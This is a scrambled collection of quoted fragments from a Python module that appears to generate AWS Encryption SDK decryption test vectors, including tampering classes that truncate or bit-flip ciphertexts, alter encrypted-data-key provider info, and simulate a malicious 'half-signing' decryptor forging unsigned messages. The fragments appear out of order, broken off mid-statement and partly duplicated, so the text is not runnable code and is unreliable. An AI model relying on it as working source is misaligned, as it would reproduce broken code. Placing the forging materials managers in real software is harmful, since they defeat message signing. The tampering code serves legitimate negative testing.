\"awses-decrypt-generate\" @staticmethod def _generate_plaintexts(plaintexts_specs): # type: (PLAINTEXTS_SPEC)", "provider info value\"\"\" tampering_materials_manager = ProviderInfoChangingCryptoMaterialsManager(materials_manager, new_provider_info) ciphertext_to_decrypt = generation_scenario.encryption_scenario.run(tampering_materials_manager)", "THIS IS ONLY USED TO CREATE INVALID MESSAGES and should", "generation_scenario.decryption_test_scenario_pair( ciphertext_writer, ciphertext_to_decrypt, expected_result ) class ProviderInfoChangingCryptoMaterialsManager(CryptoMaterialsManager): \"\"\" Custom CMM", "for every possible bit.\"\"\" # pylint: disable=R0201 def run_scenario_with_tampering(self, ciphertext_writer,", "= spec.items() if tampering_tag == \"change-edk-provider-info\": return ChangeEDKProviderInfoTamperingMethod.from_values_spec(tampering_values_spec) raise ValueError(\"Unrecognized", "provider info on all EDKs.\"\"\" # pylint: disable=R0201 def run_scenario_with_tampering(self,", "``ciphertext_writer`` and returning a :class:`MessageDecryptionTestScenario` that describes the matching decrypt", "in raw_manifest[\"tests\"].items(): try: tests[name] = MessageDecryptionTestScenarioGenerator.from_scenario( scenario=scenario, keys=keys, plaintexts=plaintexts )", "decrypt_scenario_name, decrypt_scenario in scenario.run( ciphertext_writer, plaintext_uris[scenario.encryption_scenario.plaintext_name] ).items() } decrypt_manifest =", "\"\"\"AWS Encryption SDK Decryption Message Generation manifest handler. Described in", "in production! It is imitating what a malicious decryptor without", "CMM, and then changing the algorithm suite and removing the", "in compliance with the License. A copy of # the", "scenario[\"decryption-master-keys\"] ] def decryption_master_key_provider_fn(): return master_key_provider_from_master_key_specs(keys, decryption_master_key_specs) else: decryption_master_key_specs =", "__init__(self, new_provider_infos): \"\"\"Create a new instance for a given new", "returning a :class:`MessageDecryptionTestScenario` that describes the matching decrypt scenario. :param", "_plaintext_uri): \"\"\" Run a given scenario, tampering with the input", "tampering for a specific new provider info value\"\"\" tampering_materials_manager =", "tamper with the ciphertext :type tampering_method: :class:`TamperingMethod` :param decryption_method: :param", "is imitating what a malicious decryptor without encryption permissions might", "master_key_specs=self.decryption_master_key_specs, master_key_provider_fn=self.decryption_master_key_provider_fn, decryption_method=self.decryption_method, result=expected_result, ), ) @attr.s class MessageDecryptionGenerationManifest(object): \"\"\"AWS", "class ProviderInfoChangingCryptoMaterialsManager(CryptoMaterialsManager): \"\"\" Custom CMM that modifies the provider info", "might do, to attempt to forge an unsigned message from", "attr.ib(validator=attr.validators.instance_of(six.string_types)) def __init__(self, materials_manager, new_provider_info): \"\"\"Create a new CMM that", "MessageDecryptionTestResult, MessageDecryptionTestScenario, ) from awses_test_vectors.manifests.full_message.encrypt import MessageEncryptionTestScenario from awses_test_vectors.manifests.keys import", "scenario.get(\"decryption-method\") decryption_method = DecryptionMethod(decryption_method_spec) if decryption_method_spec else None if \"decryption-master-keys\"", "that will write the requested named ciphertext and return a", "provider info field on EDKS. THIS IS ONLY USED TO", "# http://aws.amazon.com/apache2.0/ # # or in the \"license\" file accompanying", "write the requested named ciphertext and return a URI locating", "PLAINTEXTS_SPEC, ) except ImportError: # pragma: no cover # We", "requested named ciphertext and return a URI locating the written", "KeysManifest.from_manifest_spec(raw_keys_manifest) plaintexts = cls._generate_plaintexts(raw_manifest[\"plaintexts\"]) tests = {} for name, scenario", "if spec == \"truncate\": return TruncateTamperingMethod() if spec == \"mutate\":", "name, plaintext in self.plaintexts.items()} ciphertext_writer = file_writer(os.path.join(root_dir, \"ciphertexts\")) test_scenarios =", "this manifest :param KeysManifest keys: Loaded keys :param dict plaintexts:", "= attr.ib(validator=attr.validators.optional(attr.validators.instance_of(MessageDecryptionTestResult))) @classmethod def from_scenario(cls, scenario, keys, plaintexts): \"\"\"Load from", "callable ciphertext_writer: Callable that will write the requested named ciphertext", "\"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF # ANY", "incompatible typing modules from typing import IO, Callable, Dict, Iterable,", "the signing key from teh result. \"\"\" if request.algorithm ==", "list of (ciphertext, result) pairs. \"\"\" ciphertext_to_decrypt = generation_scenario.encryption_scenario.run() return", "try: # Python 3.5.0 and 3.5.1 have incompatible typing modules", "range(0, len(ciphertext_to_decrypt) * BITS_PER_BYTE) ] @classmethod def flip_bit(cls, ciphertext, bit):", "a new CMM that wraps a the given CMM.\"\"\" self.wrapped_cmm", "validate_manifest_type, ) from awses_test_vectors.manifests.full_message.decrypt import ( DecryptionMethod, MessageDecryptionManifest, MessageDecryptionTestResult, MessageDecryptionTestScenario,", "the wrapped default CMM, and then changing the algorithm suite", "six.binary_type)) tests = attr.ib(validator=dictionary_validator(six.string_types, MessageDecryptionTestScenarioGenerator)) type_name = \"awses-decrypt-generate\" @staticmethod def", "language governing permissions and limitations under the License. \"\"\" AWS", "ciphertext, bit): \"\"\"Flip only the given bit in the given", "@attr.s class MessageDecryptionTestScenarioGenerator(object): # pylint: disable=too-many-instance-attributes \"\"\"Data class for a", "Mapping of plaintext names to plaintext values :param dict tests:", "EDKS. THIS IS ONLY USED TO CREATE INVALID MESSAGES and", "] class HalfSigningCryptoMaterialsManager(CryptoMaterialsManager): \"\"\" Custom CMM that generates materials for", "message at every byte (except zero).\"\"\" # pylint: disable=R0201 def", "self.new_provider_infos ] def run_scenario_with_new_provider_info( self, ciphertext_writer, generation_scenario, materials_manager, new_provider_info ):", "input_file): # type: (IO) -> MessageDecryptionGenerationManifest \"\"\"Load from a file", "= file_writer(root_dir) root_writer(\"keys.json\", json.dumps(self.keys.manifest_spec, indent=json_indent).encode(ENCODING)) plaintext_writer = file_writer(os.path.join(root_dir, \"plaintexts\")) plaintext_uris", "to and from manifest specs. :param MessageEncryptionTestScenario encryption_scenario: Encryption parameters", "def run_scenario_with_new_provider_info( self, ciphertext_writer, generation_scenario, materials_manager, new_provider_info ): \"\"\"Run with", "AWS Encryption SDK Decrypt Message Generation. :param int version: Version", "spec == \"half-sign\": return HalfSigningTamperingMethod() ((tampering_tag, tampering_values_spec),) = spec.items() if", "manifest handler. Described in AWS Crypto Tools Test Vector Framework", "\"\"\"Load from a tampering parameters specification\"\"\" return ChangeEDKProviderInfoTamperingMethod(values_spec) # pylint:", "self.new_provider_info return result def decrypt_materials(self, request): \"\"\"Thunks to the wrapped", "from a scenario specification. :param dict scenario: Scenario specification JSON", "specific new provider info value\"\"\" tampering_materials_manager = ProviderInfoChangingCryptoMaterialsManager(materials_manager, new_provider_info) ciphertext_to_decrypt", "decrypt scenario. :param callable ciphertext_writer: Callable that will write the", "encrypt test scenarios and write the resulting data and manifests", "AlgorithmSuite.AES_256_GCM_HKDF_SHA512_COMMIT_KEY: signing_request = copy(request) signing_request.algorithm = AlgorithmSuite.AES_256_GCM_HKDF_SHA512_COMMIT_KEY_ECDSA_P384 result = self.wrapped_default_cmm.get_encryption_materials(signing_request)", "import copy import attr import six from aws_encryption_sdk.caches.local import LocalCryptoMaterialsCache", "attr.ib(validator=iterable_validator(list, MasterKeySpec)) decryption_master_key_provider_fn = attr.ib(validator=attr.validators.is_callable()) result = attr.ib(validator=attr.validators.optional(attr.validators.instance_of(MessageDecryptionTestResult))) @classmethod def", "= attr.ib(validator=iterable_validator(list, MasterKeySpec)) decryption_master_key_provider_fn = attr.ib(validator=attr.validators.is_callable()) result = attr.ib(validator=attr.validators.optional(attr.validators.instance_of(MessageDecryptionTestResult))) @classmethod", ":param int json_indent: Number of spaces to indent JSON files", "\"half-sign\": return HalfSigningTamperingMethod() ((tampering_tag, tampering_values_spec),) = spec.items() if tampering_tag ==", "manifest :rtype: MessageEncryptionManifest \"\"\" raw_manifest = json.load(input_file) validate_manifest_type( type_name=cls.type_name, manifest_version=raw_manifest[\"manifest\"],", "CMM.\"\"\" self.wrapped_cmm = materials_manager self.new_provider_info = new_provider_info def get_encryption_materials(self, request):", "try: from aws_encryption_sdk.identifiers import AlgorithmSuite except ImportError: from aws_encryption_sdk.identifiers import", "the algorithm suite and removing the signing key from teh", "__init__(self, materials_manager, new_provider_info): \"\"\"Create a new CMM that wraps a", "Generation manifest handler. Described in AWS Crypto Tools Test Vector", "attr.ib(validator=dictionary_validator(six.string_types, MessageDecryptionTestScenarioGenerator)) type_name = \"awses-decrypt-generate\" @staticmethod def _generate_plaintexts(plaintexts_specs): # type:", "(except zero).\"\"\" # pylint: disable=R0201 def run_scenario_with_tampering(self, ciphertext_writer, generation_scenario, _plaintext_uri):", "given CMM.\"\"\" self.wrapped_cmm = materials_manager self.new_provider_info = new_provider_info def get_encryption_materials(self,", "write minified) \"\"\" root_dir = os.path.abspath(target_directory) root_writer = file_writer(root_dir) root_writer(\"keys.json\",", "CMM, and then change the provider info on each EDK.", "__init__(self, master_key_provider): \"\"\" Create a new CMM that wraps a", "materials_manager self.new_provider_info = new_provider_info def get_encryption_materials(self, request): \"\"\" Request materials", "its affiliates. All Rights Reserved. # # Licensed under the", "import Algorithm as AlgorithmSuite from awses_test_vectors.manifests.master_key import MasterKeySpec, master_key_provider_from_master_key_specs try:", "encryption permissions might do, to attempt to forge an unsigned", "or implied. See the License for the specific # language", "ciphertext with ``ciphertext_writer`` and returning a :class:`MessageDecryptionTestScenario` that describes the", "Request materials from the wrapped CMM, and then change the", "attr.ib(validator=attr.validators.optional(attr.validators.instance_of(DecryptionMethod))) decryption_master_key_specs = attr.ib(validator=iterable_validator(list, MasterKeySpec)) decryption_master_key_provider_fn = attr.ib(validator=attr.validators.is_callable()) result =", "Message Generation. \"\"\" import json import os import uuid from", "wrapped_cmm = attr.ib(validator=attr.validators.instance_of(CryptoMaterialsManager)) new_provider_info = attr.ib(validator=attr.validators.instance_of(six.string_types)) def __init__(self, materials_manager, new_provider_info):", "plaintext_uri: URI locating the written plaintext data for this scenario", "compliance with the License. A copy of # the License", "CachingCryptoMaterialsManager from aws_encryption_sdk.materials_managers.default import DefaultCryptoMaterialsManager from awses_test_vectors.internal.defaults import ENCODING from", "plaintexts=plaintexts, tests=tests) def run_and_write_to_dir(self, target_directory, json_indent=None): # type: (str, Optional[int])", "from teh result. \"\"\" if request.algorithm == AlgorithmSuite.AES_256_GCM_HKDF_SHA512_COMMIT_KEY: signing_request =", "def flip_bit(cls, ciphertext, bit): \"\"\"Flip only the given bit in", "do, to attempt to forge an unsigned message from a", "master_key_provider=master_key_provider, cache=cache, max_age=60.0, max_messages_encrypted=100, ) return [ self.run_scenario_with_new_provider_info( ciphertext_writer, generation_scenario,", "MessageDecryptionTestScenarioGenerator(object): # pylint: disable=too-many-instance-attributes \"\"\"Data class for a single full", "def decrypt_materials(self, request): \"\"\"Thunks to the wrapped default CMM\"\"\" return", "class for a single full message decrypt test scenario. Handles", "on EDKS. THIS IS ONLY USED TO CREATE INVALID MESSAGES", "no cover # We only actually need these imports when", "never be used in production! \"\"\" wrapped_cmm = attr.ib(validator=attr.validators.instance_of(CryptoMaterialsManager)) new_provider_info", "tampering method is only supported on the \" \"AES_256_GCM_HKDF_SHA512_COMMIT_KEY algorithm", "\"\"\" version = attr.ib(validator=membership_validator(SUPPORTED_VERSIONS)) keys = attr.ib(validator=attr.validators.instance_of(KeysManifest)) plaintexts = attr.ib(validator=dictionary_validator(six.string_types,", "= attr.ib(validator=attr.validators.is_callable()) result = attr.ib(validator=attr.validators.optional(attr.validators.instance_of(MessageDecryptionTestResult))) @classmethod def from_scenario(cls, scenario, keys,", "\"\"\" import json import os import uuid from copy import", "AWS Crypto Tools Test Vector Framework feature #0006 AWS Encryption", "result) pairs \"\"\" materials_manager = DefaultCryptoMaterialsManager( generation_scenario.encryption_scenario.master_key_provider_fn() ) ciphertext_to_decrypt =", "= ciphertext_writer(ciphertext_name, ciphertext_to_decrypt) return ( ciphertext_name, MessageDecryptionTestScenario( ciphertext_uri=ciphertext_uri, ciphertext=ciphertext_to_decrypt, master_key_specs=self.decryption_master_key_specs,", "\"\"\" root_dir = os.path.abspath(target_directory) root_writer = file_writer(root_dir) root_writer(\"keys.json\", json.dumps(self.keys.manifest_spec, indent=json_indent).encode(ENCODING))", "for encrypted_data_key in result.encrypted_data_keys: encrypted_data_key.key_provider.key_info = self.new_provider_info return result def", "USED TO CREATE INVALID MESSAGES and should never be used", "# noqa pylint: disable=unused-import ENCRYPT_SCENARIO_SPEC, PLAINTEXTS_SPEC, ) except ImportError: #", "specification JSON :param KeysManifest keys: Loaded keys :param dict plaintexts:", "the License. A copy of # the License is located", "CryptoMaterialsManager from aws_encryption_sdk.materials_managers.caching import CachingCryptoMaterialsManager from aws_encryption_sdk.materials_managers.default import DefaultCryptoMaterialsManager from", "from awses_test_vectors.manifests.master_key import MasterKeySpec, master_key_provider_from_master_key_specs try: # Python 3.5.0 and", "to plaintext values :return: Loaded test scenario :rtype: MessageDecryptionTestScenarioGenerator \"\"\"", "Encryption SDK Decrypt Message Generation manifest handler. Described in AWS", "parent_dir = os.path.abspath(os.path.dirname(input_file.name)) reader = file_reader(parent_dir) raw_keys_manifest = json.loads(reader(raw_manifest[\"keys\"]).decode(ENCODING)) keys", "have incompatible typing modules from typing import IO, Callable, Dict,", "when running the mypy checks pass SUPPORTED_VERSIONS = (2,) class", "the provider info on all EDKs.\"\"\" # pylint: disable=R0201 def", "generation_scenario.encryption_scenario.run(materials_manager) if generation_scenario.result: expected_result = generation_scenario.result else: expected_result = MessageDecryptionTestResult.expect_output(", "\"\"\"Load from a scenario specification. :param dict scenario: Scenario specification", "cache = LocalCryptoMaterialsCache(10) caching_cmm = CachingCryptoMaterialsManager( master_key_provider=master_key_provider, cache=cache, max_age=60.0, max_messages_encrypted=100,", "json import os import uuid from copy import copy import", "suite and removing the signing key from teh result. \"\"\"", "tests = attr.ib(validator=dictionary_validator(six.string_types, MessageDecryptionTestScenarioGenerator)) type_name = \"awses-decrypt-generate\" @staticmethod def _generate_plaintexts(plaintexts_specs):", "supported_versions=SUPPORTED_VERSIONS ) parent_dir = os.path.abspath(os.path.dirname(input_file.name)) reader = file_reader(parent_dir) raw_keys_manifest =", "describes the generated scenario :rtype: MessageDecryptionTestScenario \"\"\" return dict(self.tampering_method.run_scenario_with_tampering(ciphertext_writer, self,", "algorithm suite that includes the \"aws-crypto-public-key\" encryption context. THIS IS", "from awses_test_vectors.internal.defaults import ENCODING from awses_test_vectors.internal.util import ( dictionary_validator, file_reader,", "named ciphertext and return a URI locating the written data", "values. :param dict plaintexts_specs: Mapping of plaintext name to size", "indent=json_indent).encode(ENCODING)) plaintext_writer = file_writer(os.path.join(root_dir, \"plaintexts\")) plaintext_uris = {name: plaintext_writer(name, plaintext)", ":param result: \"\"\" encryption_scenario = attr.ib(validator=attr.validators.instance_of(MessageEncryptionTestScenario)) tampering_method = attr.ib(validator=attr.validators.optional(attr.validators.instance_of(TamperingMethod))) decryption_method", "tests = {} for name, scenario in raw_manifest[\"tests\"].items(): try: tests[name]", "that describes the generated scenario :rtype: MessageDecryptionTestScenario \"\"\" return dict(self.tampering_method.run_scenario_with_tampering(ciphertext_writer,", "the \"license\" file accompanying this file. This file is #", "spec): \"\"\"Load from a tampering specification\"\"\" if spec is None:", "modifies the provider info field on EDKS. THIS IS ONLY", "= generation_scenario.encryption_scenario.run() return [ generation_scenario.decryption_test_scenario_pair( ciphertext_writer, TruncateTamperingMethod.flip_bit(ciphertext_to_decrypt, bit), MessageDecryptionTestResult.expect_error(\"Bit {}", "return TruncateTamperingMethod() if spec == \"mutate\": return MutateTamperingMethod() if spec", "if spec == \"mutate\": return MutateTamperingMethod() if spec == \"half-sign\":", "name, scenario in self.tests.items() for decrypt_scenario_name, decrypt_scenario in scenario.run( ciphertext_writer,", "\"decryption-master-keys\" in scenario: decryption_master_key_specs = [ MasterKeySpec.from_scenario(spec) for spec in", "# pragma: no cover # We only actually need these", "this scenario :return: Decrypt test scenario that describes the generated", "time. cache = LocalCryptoMaterialsCache(10) caching_cmm = CachingCryptoMaterialsManager( master_key_provider=master_key_provider, cache=cache, max_age=60.0,", "for spec in scenario[\"decryption-master-keys\"] ] def decryption_master_key_provider_fn(): return master_key_provider_from_master_key_specs(keys, decryption_master_key_specs)", "disable=R0201 def run_scenario_with_tampering(self, ciphertext_writer, generation_scenario, plaintext_uri): \"\"\" Run a given", "# Use a caching CMM to avoid generating a new", "Test Vector Framework feature #0006 AWS Encryption SDK Decrypt Message", "decryption_master_key_specs = encryption_scenario.master_key_specs decryption_master_key_provider_fn = encryption_scenario.master_key_provider_fn result_spec = scenario.get(\"result\") result", "bytes] \"\"\"Generate required plaintext values. :param dict plaintexts_specs: Mapping of", "file_writer(root_dir) root_writer(\"keys.json\", json.dumps(self.keys.manifest_spec, indent=json_indent).encode(ENCODING)) plaintext_writer = file_writer(os.path.join(root_dir, \"plaintexts\")) plaintext_uris =", "keys = KeysManifest.from_manifest_spec(raw_keys_manifest) plaintexts = cls._generate_plaintexts(raw_manifest[\"plaintexts\"]) tests = {} for", "scenario[\"encryption-scenario\"] encryption_scenario = MessageEncryptionTestScenario.from_scenario(encryption_scenario_spec, keys, plaintexts) tampering = scenario.get(\"tampering\") tampering_method", "as AlgorithmSuite from awses_test_vectors.manifests.master_key import MasterKeySpec, master_key_provider_from_master_key_specs try: # Python", "specs. :param MessageEncryptionTestScenario encryption_scenario: Encryption parameters :param tampering_method: Optional method", "new (name, decryption scenario) pair\"\"\" ciphertext_name = str(uuid.uuid4()) ciphertext_uri =", "specific # language governing permissions and limitations under the License.", "CMM that modifies the provider info field on EDKS. THIS", ":return: Mapping of plaintext name to randomly generated bytes :rtype:", "= AlgorithmSuite.AES_256_GCM_HKDF_SHA512_COMMIT_KEY_ECDSA_P384 result = self.wrapped_default_cmm.get_encryption_materials(signing_request) result.algorithm = request.algorithm result.signing_key =", "@staticmethod def _generate_plaintexts(plaintexts_specs): # type: (PLAINTEXTS_SPEC) -> Dict[str, bytes] \"\"\"Generate", "# type: (str, Optional[int]) -> None \"\"\"Process all known encrypt", "= DefaultCryptoMaterialsManager( generation_scenario.encryption_scenario.master_key_provider_fn() ) ciphertext_to_decrypt = generation_scenario.encryption_scenario.run(materials_manager) if generation_scenario.result: expected_result", "= generation_scenario.encryption_scenario.run() return [ generation_scenario.decryption_test_scenario_pair( ciphertext_writer, ciphertext_to_decrypt[0:length], MessageDecryptionTestResult.expect_error(\"Truncated at byte", "pylint: disable=too-many-instance-attributes \"\"\"Data class for a single full message decrypt", "method is only supported on the \" \"AES_256_GCM_HKDF_SHA512_COMMIT_KEY algorithm suite.\"", "= KeysManifest.from_manifest_spec(raw_keys_manifest) plaintexts = cls._generate_plaintexts(raw_manifest[\"plaintexts\"]) tests = {} for name,", "TamperingMethod: \"\"\"Base class for all tampering methods.\"\"\" @classmethod def from_tampering_spec(cls,", "tampering_tag) # pylint: disable=R0201 def run_scenario_with_tampering(self, ciphertext_writer, generation_scenario, plaintext_uri): \"\"\"", "(ciphertext, result) pairs \"\"\" materials_manager = DefaultCryptoMaterialsManager( generation_scenario.encryption_scenario.master_key_provider_fn() ) ciphertext_to_decrypt", "= CachingCryptoMaterialsManager( master_key_provider=master_key_provider, cache=cache, max_age=60.0, max_messages_encrypted=100, ) return [ self.run_scenario_with_new_provider_info(", "\"Incorrect encrypted data key provider info: \" + new_provider_info )", "a malicious decryptor without encryption permissions might do, to attempt", "on each EDK. \"\"\" result = self.wrapped_cmm.get_encryption_materials(request) for encrypted_data_key in", "provider info on each EDK. \"\"\" result = self.wrapped_cmm.get_encryption_materials(request) for", "type: (IO) -> MessageDecryptionGenerationManifest \"\"\"Load from a file containing a", "License. \"\"\" AWS Encryption SDK Decrypt Message Generation manifest handler.", "] @classmethod def flip_bit(cls, ciphertext, bit): \"\"\"Flip only the given", "raw_manifest = json.load(input_file) validate_manifest_type( type_name=cls.type_name, manifest_version=raw_manifest[\"manifest\"], supported_versions=SUPPORTED_VERSIONS ) parent_dir =", "= { decrypt_scenario_name: decrypt_scenario for name, scenario in self.tests.items() for", ") parent_dir = os.path.abspath(os.path.dirname(input_file.name)) reader = file_reader(parent_dir) raw_keys_manifest = json.loads(reader(raw_manifest[\"keys\"]).decode(ENCODING))", "\"\"\" self.wrapped_default_cmm = DefaultCryptoMaterialsManager(master_key_provider) def get_encryption_materials(self, request): \"\"\" Generate half-signing", "@classmethod def from_file(cls, input_file): # type: (IO) -> MessageDecryptionGenerationManifest \"\"\"Load", "class HalfSigningTamperingMethod(TamperingMethod): \"\"\"Tampering method that changes the provider info on", "= ProviderInfoChangingCryptoMaterialsManager(materials_manager, new_provider_info) ciphertext_to_decrypt = generation_scenario.encryption_scenario.run(tampering_materials_manager) expected_result = MessageDecryptionTestResult.expect_error( \"Incorrect", "\"\"\" Request materials from the wrapped CMM, and then change", "scenario :rtype: MessageDecryptionTestScenario \"\"\" return dict(self.tampering_method.run_scenario_with_tampering(ciphertext_writer, self, plaintext_uri)) def decryption_test_scenario_pair(self,", "used to tamper with the ciphertext :type tampering_method: :class:`TamperingMethod` :param", "# distributed on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR", "HalfSigningCryptoMaterialsManager( generation_scenario.encryption_scenario.master_key_provider_fn() ) ciphertext_to_decrypt = generation_scenario.encryption_scenario.run(tampering_materials_manager) expected_result = MessageDecryptionTestResult.expect_error( \"Unsigned", "from awses_test_vectors.manifests.full_message.encrypt import MessageEncryptionTestScenario from awses_test_vectors.manifests.keys import KeysManifest try: from", "expected_result = MessageDecryptionTestResult.expect_error( \"Unsigned message using a data key with", ":rtype: MessageEncryptionManifest \"\"\" raw_manifest = json.load(input_file) validate_manifest_type( type_name=cls.type_name, manifest_version=raw_manifest[\"manifest\"], supported_versions=SUPPORTED_VERSIONS", "= DefaultCryptoMaterialsManager(master_key_provider) def get_encryption_materials(self, request): \"\"\" Generate half-signing materials by", "\" + new_provider_info ) return generation_scenario.decryption_test_scenario_pair( ciphertext_writer, ciphertext_to_decrypt, expected_result )", "write all output :param int json_indent: Number of spaces to", "== \"half-sign\": return HalfSigningTamperingMethod() ((tampering_tag, tampering_values_spec),) = spec.items() if tampering_tag", "typing import IO, Callable, Dict, Iterable, Optional # noqa pylint:", "in scenario: decryption_master_key_specs = [ MasterKeySpec.from_scenario(spec) for spec in scenario[\"decryption-master-keys\"]", "return ( ciphertext_name, MessageDecryptionTestScenario( ciphertext_uri=ciphertext_uri, ciphertext=ciphertext_to_decrypt, master_key_specs=self.decryption_master_key_specs, master_key_provider_fn=self.decryption_master_key_provider_fn, decryption_method=self.decryption_method, result=expected_result,", "a single full message decrypt test scenario. Handles serialization and", "\"\"\" raw_manifest = json.load(input_file) validate_manifest_type( type_name=cls.type_name, manifest_version=raw_manifest[\"manifest\"], supported_versions=SUPPORTED_VERSIONS ) parent_dir", "# pylint: disable=R0201 def run_scenario_with_tampering(self, ciphertext_writer, generation_scenario, plaintext_uri): \"\"\" Run", "aws_encryption_sdk.identifiers import AlgorithmSuite except ImportError: from aws_encryption_sdk.identifiers import Algorithm as", "run_scenario_with_tampering(self, ciphertext_writer, generation_scenario, _plaintext_uri): \"\"\" Run a given scenario, tampering", "production! \"\"\" wrapped_cmm = attr.ib(validator=attr.validators.instance_of(CryptoMaterialsManager)) new_provider_info = attr.ib(validator=attr.validators.instance_of(six.string_types)) def __init__(self,", "method tag: \" + tampering_tag) # pylint: disable=R0201 def run_scenario_with_tampering(self,", "that modifies the provider info field on EDKS. THIS IS", "to reject. \"\"\" wrapped_default_cmm = attr.ib(validator=attr.validators.instance_of(CryptoMaterialsManager)) def __init__(self, master_key_provider): \"\"\"", "result: \"\"\" encryption_scenario = attr.ib(validator=attr.validators.instance_of(MessageEncryptionTestScenario)) tampering_method = attr.ib(validator=attr.validators.optional(attr.validators.instance_of(TamperingMethod))) decryption_method =", "CachingCryptoMaterialsManager( master_key_provider=master_key_provider, cache=cache, max_age=60.0, max_messages_encrypted=100, ) return [ self.run_scenario_with_new_provider_info( ciphertext_writer,", "message, and therefore this is an important case for ESDKs", "produces a message with a single bit flipped, for every", "spec is None: return TamperingMethod() if spec == \"truncate\": return", "signing materials from the wrapped default CMM, and then changing", "None if \"decryption-master-keys\" in scenario: decryption_master_key_specs = [ MasterKeySpec.from_scenario(spec) for", "limitations under the License. \"\"\" AWS Encryption SDK Decrypt Message", "request): \"\"\" Generate half-signing materials by requesting signing materials from", "new_provider_info ) return generation_scenario.decryption_test_scenario_pair( ciphertext_writer, ciphertext_to_decrypt, expected_result ) class ProviderInfoChangingCryptoMaterialsManager(CryptoMaterialsManager):", "keys: Loaded keys :param dict plaintexts: Mapping of plaintext names", "plaintexts): \"\"\"Load from a scenario specification. :param dict scenario: Scenario", "expected_result) ] class ChangeEDKProviderInfoTamperingMethod(TamperingMethod): \"\"\"Tampering method that changes the provider", "type: (str, Optional[int]) -> None \"\"\"Process all known encrypt test", "caching_cmm = CachingCryptoMaterialsManager( master_key_provider=master_key_provider, cache=cache, max_age=60.0, max_messages_encrypted=100, ) return [", "decryption_method = attr.ib(validator=attr.validators.optional(attr.validators.instance_of(DecryptionMethod))) decryption_master_key_specs = attr.ib(validator=iterable_validator(list, MasterKeySpec)) decryption_master_key_provider_fn = attr.ib(validator=attr.validators.is_callable())", "locating the written plaintext data for this scenario :return: Decrypt", "keys, plaintexts) tampering = scenario.get(\"tampering\") tampering_method = TamperingMethod.from_tampering_spec(tampering) decryption_method_spec =", "decryption_test_scenario_pair(self, ciphertext_writer, ciphertext_to_decrypt, expected_result): \"\"\"Create a new (name, decryption scenario)", "self.wrapped_cmm.get_encryption_materials(request) for encrypted_data_key in result.encrypted_data_keys: encrypted_data_key.key_provider.key_info = self.new_provider_info return result", "plaintext_uri=plaintext_uri, plaintext=generation_scenario.encryption_scenario.plaintext ) return [ generation_scenario.decryption_test_scenario_pair(ciphertext_writer, ciphertext_to_decrypt, expected_result) ] class", "a new data key every time. cache = LocalCryptoMaterialsCache(10) caching_cmm", "algorithm suite.\" ) def decrypt_materials(self, request): \"\"\"Thunks to the wrapped", "= None return result raise NotImplementedError( \"The half-sign tampering method", "name, scenario in raw_manifest[\"tests\"].items(): try: tests[name] = MessageDecryptionTestScenarioGenerator.from_scenario( scenario=scenario, keys=keys,", "None: return TamperingMethod() if spec == \"truncate\": return TruncateTamperingMethod() if", "# type: (IO) -> MessageDecryptionGenerationManifest \"\"\"Load from a file containing", "aws_encryption_sdk.materials_managers.base import CryptoMaterialsManager from aws_encryption_sdk.materials_managers.caching import CachingCryptoMaterialsManager from aws_encryption_sdk.materials_managers.default import", "matching decrypt scenario. :param callable ciphertext_writer: Callable that will write", "ciphertext_writer, plaintext_uri): \"\"\"Run this scenario, writing the resulting ciphertext with", "Directory in which to write all output :param int json_indent:", "method that changes the provider info on all EDKs.\"\"\" new_provider_infos", "keys :param dict plaintexts: Mapping of plaintext names to plaintext", "( DecryptionMethod, MessageDecryptionManifest, MessageDecryptionTestResult, MessageDecryptionTestScenario, ) from awses_test_vectors.manifests.full_message.encrypt import MessageEncryptionTestScenario", "caching CMM to avoid generating a new data key every", "scenario. :param callable ciphertext_writer: Callable that will write the requested", "License, Version 2.0 (the \"License\"). You # may not use", "the written plaintext data for this scenario :return: Decrypt test", "We only actually need these imports when running the mypy", "flipped\".format(bit)), ) for bit in range(0, len(ciphertext_to_decrypt) * BITS_PER_BYTE) ]", "\"Unsigned message using a data key with a public key\"", "values :return: Loaded test scenario :rtype: MessageDecryptionTestScenarioGenerator \"\"\" encryption_scenario_spec =", "class TruncateTamperingMethod(TamperingMethod): \"\"\"Tampering method that truncates a good message at", "for name, size in plaintexts_specs.items()} @classmethod def from_file(cls, input_file): #", "else: expected_result = MessageDecryptionTestResult.expect_output( plaintext_uri=plaintext_uri, plaintext=generation_scenario.encryption_scenario.plaintext ) return [ generation_scenario.decryption_test_scenario_pair(ciphertext_writer,", "License for the specific # language governing permissions and limitations", "decryption_master_key_provider_fn = attr.ib(validator=attr.validators.is_callable()) result = attr.ib(validator=attr.validators.optional(attr.validators.instance_of(MessageDecryptionTestResult))) @classmethod def from_scenario(cls, scenario,", "result) pairs. \"\"\" tampering_materials_manager = HalfSigningCryptoMaterialsManager( generation_scenario.encryption_scenario.master_key_provider_fn() ) ciphertext_to_decrypt =", "manifest :param KeysManifest keys: Loaded keys :param dict plaintexts: Mapping", "message encrypt manifest. :param file input_file: File object for file", "root_dir = os.path.abspath(target_directory) root_writer = file_writer(root_dir) root_writer(\"keys.json\", json.dumps(self.keys.manifest_spec, indent=json_indent).encode(ENCODING)) plaintext_writer", "materials_manager = DefaultCryptoMaterialsManager( generation_scenario.encryption_scenario.master_key_provider_fn() ) ciphertext_to_decrypt = generation_scenario.encryption_scenario.run(materials_manager) if generation_scenario.result:", "# We only actually need these imports when running the", "Generation. \"\"\" import json import os import uuid from copy", "_generate_plaintexts(plaintexts_specs): # type: (PLAINTEXTS_SPEC) -> Dict[str, bytes] \"\"\"Generate required plaintext", "\"\"\"Data class for a single full message decrypt test scenario.", "MessageDecryptionTestScenario( ciphertext_uri=ciphertext_uri, ciphertext=ciphertext_to_decrypt, master_key_specs=self.decryption_master_key_specs, master_key_provider_fn=self.decryption_master_key_provider_fn, decryption_method=self.decryption_method, result=expected_result, ), ) @attr.s", "= LocalCryptoMaterialsCache(10) caching_cmm = CachingCryptoMaterialsManager( master_key_provider=master_key_provider, cache=cache, max_age=60.0, max_messages_encrypted=100, )", "six.string_types)) def __init__(self, new_provider_infos): \"\"\"Create a new instance for a", "Encryption SDK Decrypt Message Generation. \"\"\" import json import os", "of spaces to indent JSON files (optional: default is to", "wrapped CMM, and then change the provider info on each", "plaintext data for this scenario :return: Decrypt test scenario that", "(ciphertext, result) pairs. \"\"\" master_key_provider = generation_scenario.encryption_scenario.master_key_provider_fn() # Use a", "the resulting ciphertext with ``ciphertext_writer`` and returning a :class:`MessageDecryptionTestScenario` that", "full message encrypt manifest. :param file input_file: File object for", 